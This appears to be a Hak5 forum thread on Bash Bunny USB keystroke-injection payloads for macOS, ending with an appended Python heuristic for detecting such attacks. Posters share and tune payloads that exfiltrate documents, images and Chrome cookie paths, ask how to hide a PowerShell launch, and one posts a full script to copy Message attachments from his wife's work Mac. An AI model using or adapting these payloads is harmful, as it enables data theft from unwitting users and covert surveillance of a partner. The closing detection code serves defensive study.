WiFiJuice

OS X Payloads


@WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)



Granted, this was my first attempt at running a payload from the BB on Mac OSX, but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago).

Working at an art school we run MacOS everywhere (80-90% of our machines across academic and administrative units)

I'll keep poking at it, but if anyone has an easy fix, I'm all ears.


Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and, don't you know, it works on them all!

However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as:

  • Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
  • Set up a network listener on port 2196 for testing: /usr/bin/nc -l 2196
  • Capture some packets: tcpdump -nS
  • Capture all the packets: tcpdump -nnvvXS
  • Capture the packets for a given port: tcpdump -nnvvXs 548

These are just a couple of things to consider while I toil away with a proper OSX NMAP hack.

Cheers!


@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! :ph34r:

3 hours ago, Opticon said:

@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! :ph34r:

@Opticon just sent you a DM :)


For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)



Well @WiFiJuice, I'll get working on it. However, here's a pertinent question: what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3: restores and switches that won't execute payloads, etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer.

-Cheers


Please don't tag everyone like that, if they deem it important enough for them to give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something - but Darren rarely does). Not to mention you left me out ... :(

I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors..


How can I make something like this without PowerShell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"


2 hours ago, WiFiJuice said:

How can I make something like this without PowerShell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"


Use Python. I do not have the code off the top of my head right now, but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross-platform, with the OS X and Linux agent parts being done in Python.


The issue with the above is that, as far as I know, on Linux you need to be root or use sudo to mount a removable drive. That is the reason I chose the network approach for the BBTPS, so I do not have to worry about mounting anything on the victim.



@WiFiJuice You bring up an excellent point, one that I wish the developers had anticipated. Hopefully, as you've raised this problem before, they will look into fixing the language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.


2 hours ago, WiFiJuice said:

The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed?


I'm also using the Swedish keyboard layout. In my experience the language file works great on Windows but, as you said, spells out the character wrong.


It appears that to type ~ on a Mac with the Swedish Pro layout, which most Swedish users do, it's alt + ¨, which the Mac interprets as ~. So the keyboard file has to be changed.

5 minutes ago, RazerBlade said:

It appears that to type ~ on a Mac with the Swedish Pro layout, which most Swedish users do, it's alt + ¨, which the Mac interprets as ~. So the keyboard file has to be changed.

Yes, that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"


This is the layout of the Swedish Pro keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important tilde sign " ~ ", nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.

[Attached image: swedish_notebook.png (Swedish Pro keyboard layout)]




@Opticon do you have a git repository with some of your modifications? I'm working on modifying InfoGrabber to retrieve pictures sent via text from my wife's Mac before she has to return it to work, but I can't get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

The script dies at this line with the output: find: -exec: no terminating ";" or "+"

I can't find any documentation on what may be happening.

Any help would be great.


1 minute ago, ImInAjar said:


@Opticon do you have a git repository with some of your modifications? I'm working on modifying InfoGrabber to retrieve pictures sent via text from my wife's Mac before she has to return it to work, but I can't get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

The script dies at this line with the output: find: -exec: no terminating ";" or "+"

I can't find any documentation on what may be happening.

Any help would be great.


Full script:

#!/bin/bash
LED G R
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E

lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images
QUACK ENTER
QUACK DELAY 500
QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

# Count the copied image files (the original had two identical counts; one is kept)
files=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)

# The space before ']' is required; without it [ reports a missing ']' and the test fails
if [ "$files" != "0" ]; then
  # Got image files
  LED R B
else
  # No image files
  LED R
fi

#Eject BB
QUACK diskutil unmount BashBunny; killall terminal
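The script above enumerates as an Apple keyboard (the VID/PID on the ATTACKMODE line) and opens Terminal within a few seconds of being plugged in. That timing, not the vendor ID, is what a defender can key on. The following is an added example, not code from this thread or from any Bash Bunny project: a heuristic that flags a keyboard-class USB attach followed shortly by a terminal or shell start. The pipe-separated event records, field names and IDs are constructed for the example (only the 05ac/021e pair comes from the script above); a real deployment would parse its own telemetry (a unified log export, an EDR event feed) into the same Event shape.

```python
"""Heuristic for keystroke-injection ("HID attack") activity: a keyboard-class
USB device is attached and a terminal or shell starts within a short window.

Added illustration, not code from the thread. The 'timestamp | kind | detail'
event format and the kind names are constructed; adapt parse_line() to the
telemetry you actually collect."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Process names whose start right after a keyboard appears is suspicious.
TERMINAL_PROCS = {"Terminal", "iTerm2", "bash", "zsh", "sh", "osascript"}


@dataclass(frozen=True)
class Event:
    ts: datetime
    kind: str     # constructed taxonomy: "usb_attach" or "proc_start"
    detail: str   # device description or process name


def parse_line(line: str) -> Event:
    """Parse one 'ISO-timestamp | kind | detail' record (constructed format)."""
    ts, kind, detail = (part.strip() for part in line.split("|", 2))
    return Event(datetime.fromisoformat(ts), kind, detail)


def parse_log(text: str) -> list:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def find_hid_injection(events, window=timedelta(seconds=15)):
    """Return (attach, proc) pairs: a keyboard-class attach followed by a
    terminal/shell start within `window`. One alert per attach event."""
    events = sorted(events, key=lambda e: e.ts)
    hits = []
    for i, attach in enumerate(events):
        if attach.kind != "usb_attach" or "keyboard" not in attach.detail.lower():
            continue
        for later in events[i + 1:]:
            if later.ts - attach.ts > window:
                break          # sorted, so nothing later can fall in the window
            if later.kind == "proc_start" and later.detail in TERMINAL_PROCS:
                hits.append((attach, later))
                break
    return hits


# Constructed sample: an ordinary keyboard with no follow-up, a Bash Bunny-style
# attach (IDs from the payload above) with Terminal six seconds later, and a
# mouse (not keyboard-class) followed by Terminal. Only the middle one should fire.
SAMPLE_LOG = """\
2024-05-01T09:00:00 | usb_attach | HID keyboard vid=05ac pid=0000
2024-05-01T09:03:10 | proc_start | Safari
2024-05-01T12:30:00 | usb_attach | HID keyboard vid=05ac pid=021e
2024-05-01T12:30:06 | proc_start | Terminal
2024-05-01T12:30:07 | proc_start | bash
2024-05-01T15:00:00 | usb_attach | HID mouse vid=1234 pid=5678
2024-05-01T15:00:04 | proc_start | Terminal
"""


def scan(text: str = SAMPLE_LOG, window_seconds: float = 15):
    return find_hid_injection(parse_log(text), timedelta(seconds=window_seconds))


if __name__ == "__main__":
    for attach, proc in scan():
        gap = (proc.ts - attach.ts).total_seconds()
        print(f"ALERT: {attach.detail} attached at {attach.ts}, "
              f"{proc.detail} started {gap:.0f}s later")
```

Because the device presents Apple's vendor ID, an allow-list of "trusted" keyboard vendors would pass it; the attach-then-shell sequence is the durable signal, and the window can be tightened once you know how long real users take between plugging in a keyboard and opening Terminal.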

